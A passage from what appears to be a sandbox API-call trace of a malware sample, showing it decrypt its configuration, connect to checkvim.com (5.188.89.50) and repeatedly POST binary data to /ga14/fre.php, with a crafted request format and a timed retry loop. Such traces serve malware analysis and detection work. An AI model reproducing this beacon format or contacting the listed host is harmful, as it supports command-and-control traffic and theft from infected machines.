[0303.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0303.270] GetProcessHeap () returned 0x840000 [0303.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0303.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.271] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0303.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.276] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0303.282] GetProcessHeap () returned 0x840000 [0303.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0303.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.283] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0303.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.284] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0303.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.285] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.285] GetProcessHeap () returned 0x840000 [0303.285] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0303.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.286] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0303.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.287] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0303.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.288] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0303.288] GetProcessHeap () returned 0x840000 [0303.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0303.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.289] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0303.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.289] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0303.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.290] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0303.290] GetProcessHeap () returned 0x840000 [0303.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0303.290] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0303.294] GetProcessHeap () returned 0x840000 [0303.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0303.294] socket (af=2, type=1, protocol=6) returned 0x4f0 [0303.294] connect (s=0x4f0, name=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0303.360] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0303.360] GetProcessHeap () returned 0x840000 [0303.360] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0303.360] GetProcessHeap () returned 0x840000 [0303.360] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0303.361] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0303.363] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0303.363] GetProcessHeap () returned 0x840000 [0303.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0303.363] GetProcessHeap () returned 0x840000 [0303.363] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0303.363] GetProcessHeap () returned 0x840000 [0303.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0303.363] GetProcessHeap () returned 0x840000 [0303.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0303.364] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0303.365] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0303.365] GetProcessHeap () returned 0x840000 [0303.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0303.365] GetProcessHeap () returned 0x840000 [0303.365] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0303.365] send (s=0x4f0, buf=0x873a58*, len=237, flags=0) returned 237 [0303.366] send (s=0x4f0, buf=0x87eb58*, len=159, flags=0) returned 159 [0303.366] GetProcessHeap () returned 0x840000 [0303.366] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0303.366] recv (in: s=0x4f0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0303.724] GetProcessHeap () returned 0x840000 [0303.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0303.724] GetProcessHeap () returned 0x840000 [0303.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0303.724] GetProcessHeap () returned 0x840000 [0303.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0303.724] GetProcessHeap () returned 0x840000 [0303.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0303.724] closesocket (s=0x4f0) returned 0 [0303.725] GetProcessHeap () returned 0x840000 [0303.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0303.725] GetProcessHeap () returned 0x840000 [0303.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0303.725] GetProcessHeap () returned 0x840000 [0303.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0303.725] GetProcessHeap () returned 0x840000 [0303.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0303.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1318) returned 0x4f0 [0303.727] Sleep (dwMilliseconds=0xea60) [0303.742] GetProcessHeap () returned 0x840000 [0303.742] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0303.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.743] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0303.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0303.756] GetProcessHeap () returned 0x840000 [0303.756] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0303.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.758] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0303.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.759] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0303.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.759] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.760] GetProcessHeap () returned 0x840000 [0303.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0303.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.760] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0303.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.761] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0303.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.762] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0303.762] GetProcessHeap () returned 0x840000 [0303.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0303.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.763] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.763] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.764] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.765] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.765] GetProcessHeap () returned 0x840000 [0303.765] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0303.765] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0303.765] GetProcessHeap () returned 0x840000 [0303.765] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0303.765] GetProcessHeap () returned 0x840000 [0303.765] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0303.765] GetProcessHeap () returned 0x840000 [0303.765] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0303.765] GetProcessHeap () returned 0x840000 [0303.765] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0303.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.766] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0303.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.771] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0303.776] GetProcessHeap () returned 0x840000 [0303.776] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0303.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.777] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0303.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.777] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0303.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.778] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.778] GetProcessHeap () returned 0x840000 [0303.778] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0303.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.779] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0303.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.780] CryptDestroyKey (hKey=0x87e870) returned 1 [0303.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.780] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0303.781] GetProcessHeap () returned 0x840000 [0303.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0303.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.781] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0303.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.782] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0303.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.783] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0303.783] GetProcessHeap () returned 0x840000 [0303.783] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0303.783] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0303.784] GetProcessHeap () returned 0x840000 [0303.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0303.784] socket (af=2, type=1, protocol=6) returned 0x4f4 [0303.784] connect (s=0x4f4, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0303.855] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0303.855] GetProcessHeap () returned 0x840000 [0303.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0303.855] GetProcessHeap () returned 0x840000 [0303.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0303.856] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0303.857] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0303.857] GetProcessHeap () returned 0x840000 [0303.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0303.857] GetProcessHeap () returned 0x840000 [0303.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0303.857] GetProcessHeap () returned 0x840000 [0303.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0303.857] GetProcessHeap () returned 0x840000 [0303.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0303.858] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0303.859] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0303.859] GetProcessHeap () returned 0x840000 [0303.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0303.859] GetProcessHeap () returned 0x840000 [0303.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0303.859] send (s=0x4f4, buf=0x873a58*, len=237, flags=0) returned 237 [0303.861] send (s=0x4f4, buf=0x87eb58*, len=159, flags=0) returned 159 [0303.861] GetProcessHeap () returned 0x840000 [0303.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0303.861] recv (in: s=0x4f4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0304.241] GetProcessHeap () returned 0x840000 [0304.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0304.241] GetProcessHeap () returned 0x840000 [0304.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0304.241] GetProcessHeap () returned 0x840000 [0304.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0304.241] GetProcessHeap () returned 0x840000 [0304.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0304.241] closesocket (s=0x4f4) returned 0 [0304.242] GetProcessHeap () returned 0x840000 [0304.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0304.242] GetProcessHeap () returned 0x840000 [0304.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0304.242] GetProcessHeap () returned 0x840000 [0304.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0304.242] GetProcessHeap () returned 0x840000 [0304.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0304.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1308) returned 0x4f4 [0304.245] Sleep (dwMilliseconds=0xea60) [0304.246] GetProcessHeap () returned 0x840000 [0304.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0304.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.248] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0304.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.255] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0304.261] GetProcessHeap () returned 0x840000 [0304.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0304.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.262] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0304.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.263] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0304.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.275] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.275] GetProcessHeap () returned 0x840000 [0304.275] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0304.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.276] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0304.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.277] CryptDestroyKey (hKey=0x87e830) returned 1 [0304.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.278] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0304.278] GetProcessHeap () returned 0x840000 [0304.279] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0304.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.280] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.281] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.282] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.282] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.283] GetProcessHeap () returned 0x840000 [0304.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0304.283] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0304.283] GetProcessHeap () returned 0x840000 [0304.283] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0304.283] GetProcessHeap () returned 0x840000 [0304.283] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0304.283] GetProcessHeap () returned 0x840000 [0304.283] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0304.283] GetProcessHeap () returned 0x840000 [0304.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0304.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.284] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0304.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.288] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0304.294] GetProcessHeap () returned 0x840000 [0304.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0304.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.295] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0304.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.295] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0304.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.296] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.296] GetProcessHeap () returned 0x840000 [0304.296] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0304.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 